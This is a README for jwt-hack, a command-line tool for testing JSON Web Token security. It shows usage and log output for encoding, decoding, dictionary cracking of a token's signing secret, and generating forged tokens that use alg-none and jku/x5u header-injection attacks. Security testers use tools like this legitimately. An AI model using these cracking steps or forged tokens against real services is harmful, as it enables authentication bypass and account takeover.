jwt-hack is tool for hacking / security testing to JWT. Supported for En/decoding JWT, Generate payload for JWT attack and very fast cracking(dict/brutefoce)

Installation

go-get(dev version)

$ go get -u github.com/hahwul/jwt-hack

homebrew

$ brew tap hahwul/jwt-hack$ brew install jwt-hack

snapcraft

$ sudo snap install jwt-hack

Usage

   d8p 8d8   d88 888888888          888  888 ,8b.     doooooo 888  ,dP   88p 888,o.d88    '88d     ______ 88888888 88'8o    d88     888o8P'   88P 888P`Y8b8   '888      XXXXXX 88P  888 88PPY8.  d88     888 Y8L88888' 88P   YP8 '88p               88P  888 8b   `Y' d888888 888  `8p-------------------------Hack the JWT(JSON Web Token) | by @hahwul | v1.0.0Usage:  jwt-hack [command]Available Commands:  crack       Cracking JWT Token  decode      Decode JWT to JSON  encode      Encode json to JWT  help        Help about any command  payload     Genera   te JWT Attack payloads  version     Show versionFlags:  -h, --help   help for jwt-hack

Encode mode(JSON to JWT)

$ jwt-hack encode '{"json":"format"}' --secret={YOUR_SECRET}

e.g

$ jwt-hack encode '{"test":"1234"}' --secret=asdf   d8p 8d8   d88 888888888          888  888 ,8b.     doooooo 888  ,dP   88p 888,o.d88    '88d     ______ 88888888 88'8o    d88     888o8P'   88P 888P`Y8b8   '888      XXXXXX 88P  888 88PPY8.  d88     888 Y8L88888' 88P   YP8 '88p               88P  888 8b   `Y' d888888 888  `8p-------------------------INFO[0000] Encoded result                                algorithm=HS256eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZXN0IjoiMTIzNCJ9.JOL1SYkRZYUz9GVny-DgoDj60C0RLz929h1_fFcpqQA

Decode mode(JWT to JSON)

$ jwt-hack decode {JWT_CODE}

e.g

$ jwt-hack decode eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c   d8p 8d8   d88 888888888          888  888 ,8b.     doooooo 888  ,dP   88p 888,o.d88    '88d     ______ 88888888 88'8o    d88     888o8P'   88P 888P`Y8b8   '888      XXXXXX 88P  888 88PPY8.  d88     888 Y8L88888' 88P   YP8 '88p               88P  888 8b   `Y' d888888 888  `8p-------------------------INFO[0000] Decoded data(claims)                          header="{\"alg\":\"HS256\",\"typ\":\"JWT\"}" method="&{HS256 5}"{"iat":1516239022,"name":"John Doe","sub":"1234567890"}

Crack mode(Dictionary attack / BruteForce)

$ jwt-hack crack -w {WORDLIST} {JWT_CODE}

e.g

$ jwt-hack crack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.5mhBHqs5_DTLdINd9p5m7ZJ6XD0Xc55kIaCRY5r6HRA -w samples/wordlist.txt   d8p 8d8   d88 888888888          888  888 ,8b.     doooooo 888  ,dP   88p 888,o.d88    '88d     ______ 88888888 88'8o    d88     888o8P'   88P 888P`Y8b8   '888      XXXXXX 88P  888 88PPY8.  d88     888 Y8L88888' 88P   YP8 '88p               88P  888 8b   `Y' d888888 888  `8p-------------------------[*] Start dict cracking modeINFO[0000] Loaded words (remove duplicated)              size=16INFO[0000] Invalid signature                             word=fasINFO[0000] Invalid signature                             word=asdINFO[0000] Invalid signature                             word=1234INFO[0000] Invalid signature                             word=efqINFO[0000] Invalid signature                             word=asdfINFO[0000] Invalid signature                             word=2qINFO[0000] Found! Token signature secret is test         Signature=Verified Word=testINFO[0000] Invalid signature                             word=dfasINFO[0000] Invalid signature                             word=gaINFO[0000] Invalid signature                             word=fINFO[0000] Invalid signature                             word=dsINFO[0000] Invalid signature                             word=sadINFO[0000] Invalid signature                             word=qsf...INFO[0000] Invalid signature                             word=passwordINFO[0000] Invalid signature                             word=errorINFO[0000] Invalid signature                             word=calendar[+] Found! JWT signature secret: test[+] Finish crack mode

Payload mode(Alg none attack, etc..)

$ jwt-hack payload {JWT_CODE}

e.g

$ jwt-hack payload eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.5mhBHqs5_DTLdINd9p5m7ZJ6XD0Xc55kIaCRY5r6HRA   d8p 8d8   d88 888888888          888  888 ,8b.     doooooo 888  ,dP   88p 888,o.d88    '88d     ______ 88888888 88'8o    d88     888o8P'   88P 888P`Y8b8   '888      XXXXXX 88P  888 88PPY8.  d88     888 Y8L88888' 88P   YP8 '88p               88P  888 8b   `Y' d888888 888  `8p-------------------------payload calledINFO[0000] Generate none payload                         header="{\"alg\":\"none\",\"typ\":\"JWT\"}" payload=noneeyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.INFO[0000] Generate NonE payload                         header="{\"alg\":\"NonE\",\"typ\":\"JWT\"}" payload=NonEeyJhbGciOiJOb25FIiwidHlwIjoiSldUIn0=.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDI   yfQ.INFO[0000] Generate NONE payload                         header="{\"alg\":\"NONE\",\"typ\":\"JWT\"}" payload=NONEeyJhbGciOiJOT05FIiwidHlwIjoiSldUIn0=.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.INFO[0000] Generate jku payload                          header="{\"alg\":\"hs256\",\"jku\":\"https://www.google.com\",\"typ\":\"JWT\"}" payload=jkueyJhbGciOiJoczI1NiIsImprdSI6Imh0dHBzOi8vd3d3Lmdvb2dsZS5jb20iLCJ0eXAiOiJKV1QifQ==.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.INFO[0000] Generate x5u payload                          header="{\"alg\":\"hs256\",\"x5u\":\"https://www.google.com\",\"typ\":\"JWT\"}" payload=x5ueyJhbGciOiJoczI1NiIsIng1dSI6Imh0dHBzOi8vd3d3Lmdvb2dsZS5jb20iLCJ0eXAiOiJKV1QifQ==.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.